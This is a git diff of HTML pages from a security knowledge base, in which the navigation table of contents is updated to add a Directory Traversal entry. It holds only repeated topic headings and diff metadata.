  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Initial Ana - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html index c15320cf..a03203e2 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Installation - - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html index 5e4eb254..7c48aa6b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
